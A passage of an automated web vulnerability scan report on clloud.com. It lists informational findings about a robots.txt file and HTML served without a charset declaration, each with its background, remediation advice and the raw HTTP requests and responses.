User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:18:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Tue, 31 Aug 2010 16:26:09 GMT
ETag: "ac442-6cb-48f2109dcca40"
Accept-Ranges: bytes
Content-Length: 1739
Content-Type: text/css

/* RECAPTCHA STYLING */
.recaptcha-error {
font-size: 1.8em;
padding-bottom: 8px;
}
/* END RECAPTCHA STYLING */

/* MAILHIDE STYLING */

/* This is for plain text emails i.e. haha@lol.com - TEXT*/
.mh-plaintext {
background:transparent url(email.png) no-repeat scroll left center;
border:medium none;
color:#2277DD;
height:16px;
padding:2px 2px 4px 20px;
}

/* This is for plain text emails i.e. haha@lol.com - DOTS*/
.mh-plaintext a, .mh-plaintext a:hover, .mh-plaintext a:visited, .mh-plaintext a:visited:hover {
color: #FF7700;
font-weight: bolder;
text-decoration: none;
border: 0;
backgrou
...[SNIP]...
<a href="mailto:ohnoes@pwnies.com">
...[SNIP]...
<a href="mailto:ohnoes@pwnies.com">
...[SNIP]...

6. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: clloud.com

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:23:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
X-Pingback: http://clloud.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://clloud.com/sitemap.xml.gz

7. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clloud.com
Path:   /

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /?xd_receiver=1 HTTP/1.1
Host: clloud.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=dede1b193bdee860c80cdc6ff6fbfdb2&extern=0&channel=http%3A%2F%2Fclloud.com%2F%3Fxd_receiver%3D1&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=129154910.1293553097.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129154910.137112135.1293553097.1293553097.1293553097.1; __utmc=129154910; __utmb=129154910.1.10.1293553097

Response

HTTP/1.1 200 OK
Date: Tue, 28 Dec 2010 16:18:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<scr
...[SNIP]...

Report generated by XSS.CX at Tue Dec 28 11:28:42 CST 2010.